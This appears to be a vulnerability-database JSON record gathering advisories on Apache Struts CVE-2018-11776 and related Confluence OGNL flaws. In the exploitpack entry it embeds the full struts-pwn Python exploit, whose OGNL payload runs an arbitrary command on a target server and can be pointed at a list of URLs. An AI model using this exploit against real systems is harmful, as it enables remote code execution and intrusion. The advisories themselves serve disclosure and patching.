Storwize, IBM Spectrum Virtualize and IBM FlashSystem products (CVE-2018-11776)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-03-29T01:48:02", "id": "709EFBBA0822EBB77C07CD194232C954374F9FDFBE66E10E5A72224A58470EAA", "href": "https://www.ibm.com/support/pages/node/741137", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2018-08-23T14:31:18", "description": "It is possible to perform a RCE attack when the namespace value isn't set for a result defined in underlying xml configurations and in the same time, its upper action(s) configurations have no or wildcard namespace. The Same possibility when using the url tag which doesn't have value and action set and in the same time, its upper action(s) configurations have no or wildcard namespace. -- Apache Struts2 Team \n2018 8 May 23, Apache Strust2 released the latest security Bulletin, the Apache Struts2 there is a remote code execution of high-risk vulnerability by Semmle Security Research team of security researchers reporting vulnerabilities number of CVE-2018-11776\uff08S2-057 in. Struts2 in XML configuration, if the namespace value is not set and the Action Configuration is not set or wildcard namespace may lead to remote code execution. \n\n0x01 vulnerability affect \nAffect \nDetermining CVE-2018-11776 as a high-risk vulnerability. \nThe actual scene there are some limitations that need to meet certain conditions. \nImpact version \nStruts 2.3 to 2.3.34 \nThe Struts 2.5 to 2.5.16 \nFix version \nThe Struts 2.3.35 \nThe Struts 2.5.17 \n\n0x02 vulnerability verification \n! [](/Article/UploadPic/2018-8/2018823153240150. png) \nIncoming OGNL expression${2333+2333} \n! [](/Article/UploadPic/2018-8/2018823153240244. png) \nSuccess with the execution of the function, and perform \n! [](/Article/UploadPic/2018-8/2018823153240318. png) \nReturns the result to the URL \n\n0x03 repair recommendations \nThe official recommended to upgrade the Struts to 2. 3. 35 version or 2. 5. 17 version \nThe updated version there are no compatibility issues \n\n0x04 timeline \n2018-08-22 vulnerability disclosure \n2018-08-22 360CERT publish early warning analysis advertisement \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T00:00:00", "type": "myhack58", "title": "Apache Struts2 S2-057 vulnerability analysis and early warning-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-23T00:00:00", "id": "MYHACK58:62201891267", "href": "http://www.myhack58.com/Article/html/3/62/2018/91267.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:27:15", "description": "A remote code execution vulnerability exists in Apache Struts. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts Remote Code Execution (CVE-2018-11776)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-12T00:00:00", "id": "CPAI-2018-0849", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:29:45", "description": "A remote code execution vulnerability exists in Atlassian Confluence. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2021-26084)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-09T00:00:00", "id": "CPAI-2021-0548", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-04T10:03:06", "description": "A remote code execution vulnerability exists in Atlassian Confluence. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2022-26134)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-12T00:00:00", "id": "CPAI-2022-0297", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-12-01T14:55:58", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible\nRemote Code Execution when alwaysSelectFullNamespace is true (either by\nuser or a plugin like Convention Plugin) and then: results are used with no\nnamespace and in same time, its upper package have no or wildcard namespace\nand similar to results, same possibility when using url tag which doesn't\nhave value and action set and in same time, its upper package have no or\nwildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T00:00:00", "type": "ubuntucve", "title": "CVE-2018-11776", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-22T00:00:00", "id": "UB:CVE-2018-11776", "href": "https://ubuntu.com/security/CVE-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T13:35:47", "description": "In affected versions of Confluence Server and Data Center, an OGNL\ninjection vulnerability exists that would allow an unauthenticated attacker\nto execute arbitrary code on a Confluence Server or Data Center instance.\nThe affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before\n7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0\nbefore 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "ubuntucve", "title": "CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T00:00:00", "id": "UB:CVE-2022-26134", "href": "https://ubuntu.com/security/CVE-2022-26134", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2023-06-19T15:41:33", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time, its upper action(s) have no or wildcard namespace. ([CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-24T03:58:00", "type": "f5", "title": "Apache Struts vulnerability CVE-2018-11776", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2022-02-28T06:11:00", "id": "F5:K60499474", "href": "https://support.f5.com/csp/article/K60499474", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in Apache Struts 2 multiple tags result namespace handling\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-20T00:00:00", "type": "dsquare", "title": "Apache Struts 2 Multiple Tags Result Namespace Handling RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-10-20T00:00:00", "id": "E-666", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache Struts 2.3 2.3.34 2.5 2.5.16 - Remote Code Execution (1)", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-26T00:00:00", "type": "exploitpack", "title": "Apache Struts 2.3 2.3.34 2.5 2.5.16 - Remote Code Execution (1)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-26T00:00:00", "id": "EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE", "href": "", "sourceData": "#!/usr/bin/env python3\n# coding=utf-8\n# *****************************************************\n# struts-pwn: Apache Struts CVE-2018-11776 Exploit\n# Author:\n# Mazin Ahmed <Mazin AT MazinAhmed DOT net>\n# This code uses a payload from:\n# https://github.com/jas502n/St2-057\n# *****************************************************\n\nimport argparse\nimport random\nimport requests\nimport sys\ntry:\n from urllib import parse as urlparse\nexcept ImportError:\n import urlparse\n\n# Disable SSL warnings\ntry:\n import requests.packages.urllib3\n requests.packages.urllib3.disable_warnings()\nexcept Exception:\n pass\n\nif len(sys.argv) <= 1:\n print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')\n print('[*] Struts-PWN - @mazen160')\n print('\\n%s -h for help.' % (sys.argv[0]))\n exit(0)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-u\", \"--url\",\n dest=\"url\",\n help=\"Check a single URL.\",\n action='store')\nparser.add_argument(\"-l\", \"--list\",\n dest=\"usedlist\",\n help=\"Check a list of URLs.\",\n action='store')\nparser.add_argument(\"-c\", \"--cmd\",\n dest=\"cmd\",\n help=\"Command to execute. (Default: 'id')\",\n action='store',\n default='id')\nparser.add_argument(\"--exploit\",\n dest=\"do_exploit\",\n help=\"Exploit.\",\n action='store_true')\n\n\nargs = parser.parse_args()\nurl = args.url if args.url else None\nusedlist = args.usedlist if args.usedlist else None\ncmd = args.cmd if args.cmd else None\ndo_exploit = args.do_exploit if args.do_exploit else None\n\nheaders = {\n 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',\n # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\n 'Accept': '*/*'\n}\ntimeout = 3\n\n\ndef parse_url(url):\n \"\"\"\n Parses the URL.\n \"\"\"\n\n # url: http://example.com/demo/struts2-showcase/index.action\n\n url = url.replace('#', '%23')\n url = url.replace(' ', '%20')\n\n if ('://' not in url):\n url = str(\"http://\") + str(url)\n scheme = urlparse.urlparse(url).scheme\n\n # Site: http://example.com\n site = scheme + '://' + urlparse.urlparse(url).netloc\n\n # FilePath: /demo/struts2-showcase/index.action\n file_path = urlparse.urlparse(url).path\n if (file_path == ''):\n file_path = '/'\n\n # Filename: index.action\n try:\n filename = url.split('/')[-1]\n except IndexError:\n filename = ''\n\n # File Dir: /demo/struts2-showcase/\n file_dir = file_path.rstrip(filename)\n if (file_dir == ''):\n file_dir = '/'\n\n return({\"site\": site,\n \"file_dir\": file_dir,\n \"filename\": filename})\n\n\ndef build_injection_inputs(url):\n \"\"\"\n Builds injection inputs for the check.\n \"\"\"\n\n parsed_url = parse_url(url)\n injection_inputs = []\n url_directories = parsed_url[\"file_dir\"].split(\"/\")\n\n try:\n url_directories.remove(\"\")\n except ValueError:\n pass\n\n for i in range(len(url_directories)):\n injection_entry = \"/\".join(url_directories[:i])\n\n if not injection_entry.startswith(\"/\"):\n injection_entry = \"/%s\" % (injection_entry)\n\n if not injection_entry.endswith(\"/\"):\n injection_entry = \"%s/\" % (injection_entry)\n\n injection_entry += \"{{INJECTION_POINT}}/\" # It will be renderred later with the payload.\n injection_entry += parsed_url[\"filename\"]\n\n injection_inputs.append(injection_entry)\n\n return(injection_inputs)\n\n\ndef check(url):\n random_value = int(''.join(random.choice('0123456789') for i in range(2)))\n multiplication_value = random_value * random_value\n injection_points = build_injection_inputs(url)\n parsed_url = parse_url(url)\n print(\"[%] Checking for CVE-2018-11776\")\n print(\"[*] URL: %s\" % (url))\n print(\"[*] Total of Attempts: (%s)\" % (len(injection_points)))\n attempts_counter = 0\n\n for injection_point in injection_points:\n attempts_counter += 1\n print(\"[%s/%s]\" % (attempts_counter, len(injection_points)))\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value))\n try:\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\n except Exception as e:\n print(\"EXCEPTION::::--> \" + str(e))\n continue\n if \"Location\" in resp.headers.keys():\n if str(multiplication_value) in resp.headers['Location']:\n print(\"[*] Status: Vulnerable!\")\n return(injection_point)\n print(\"[*] Status: Not Affected.\")\n return(None)\n\n\ndef exploit(url, cmd):\n parsed_url = parse_url(url)\n\n injection_point = check(url)\n if injection_point is None:\n print(\"[%] Target is not vulnerable.\")\n return(0)\n print(\"[%] Exploiting...\")\n\n payload = \"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd)\n\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload)\n\n try:\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\n except Exception as e:\n print(\"EXCEPTION::::--> \" + str(e))\n return(1)\n\n print(\"[%] Response:\")\n print(resp.text)\n return(0)\n\n\ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):\n if url:\n if not do_exploit:\n check(url)\n else:\n exploit(url, cmd)\n\n if usedlist:\n URLs_List = []\n try:\n f_file = open(str(usedlist), \"r\")\n URLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\")\n try:\n URLs_List.remove(\"\")\n except ValueError:\n pass\n f_file.close()\n except Exception as e:\n print(\"Error: There was an error in reading list file.\")\n print(\"Exception: \" + str(e))\n exit(1)\n for url in URLs_List:\n if not do_exploit:\n check(url)\n else:\n exploit(url, cmd)\n\n print(\"[%] Done.\")\n\n\nif __name__ == \"__main__\":\n try:\n main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)\n except KeyboardInterrupt:\n print(\"\\nKeyboardInterrupt Detected.\")\n print(\"Exiting...\")\n exit(0)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2023-06-21T02:43:47", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T08:49:33", "type": "redhatcve", "title": "CVE-2018-11776", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-04-06T05:27:20", "id": "RH:CVE-2018-11776", "href": "https://access.redhat.com/security/cve/cve-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-12-03T16:07:25", "description": "Apache Struts contains a vulnerability that allows for remote code execution under two circumstances. One, where the alwaysSelectFullNamespace option is true and the value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace. Or, using URL tag which doesn\ufffdt have value and action set and in same time, its upper package configuration have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache Struts Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-11776", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T16:07:25", "description": "Atlassian Confluence Server and Data Server contain an Object-Graph Navigation Language (OGNL) injection vulnerability that may allow an unauthenticated attacker to execute code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Atlassian Confluence Server and Data Center Object-Graph Navigation Language (OGNL) Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-26084", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:41:57", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn\u2019t have value and action set and in same time, its upper package have no or wildcard namespace.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at April 14, 2020 6:33pm UTC reported:\n\nThis vulnerability exists within the Apache Struts OGNL method dispatch routine. An attacker can submit a specially crafted HTTP request to a vulnerable web server. Specifically an attacker can taint the `name` parameter passed to [`OgnlUtil::getValue()`](<https://lgtm.com/projects/g/apache/struts/snapshot/02518d8149ff0b60863b4012cd3268cf0f2942b7/files/core/src/main/java/com/opensymphony/xwork2/ognl/OgnlUtil.java?sort=name&dir=ASC&mode=heatmap#L301>).\n\nExploitation of this vulnerability would lead to code execution within the context of the Java process powering the server. An indicator of compromise will be present in the logs at the `DEBUG` level. This IOC will look like a malformed value in the `Executing action method =` message.\n\nThe default configuration is not vulnerable. The `alwaysSelectFullNamespace` option must be enabled. This can be done by adding `<constant name=\"struts.mapper.alwaysSelectFullNamespace\" value=\"true\" />` to the `struts.xml` configuration file.\n\nAssessed Attacker Value: 4 \nAssessed 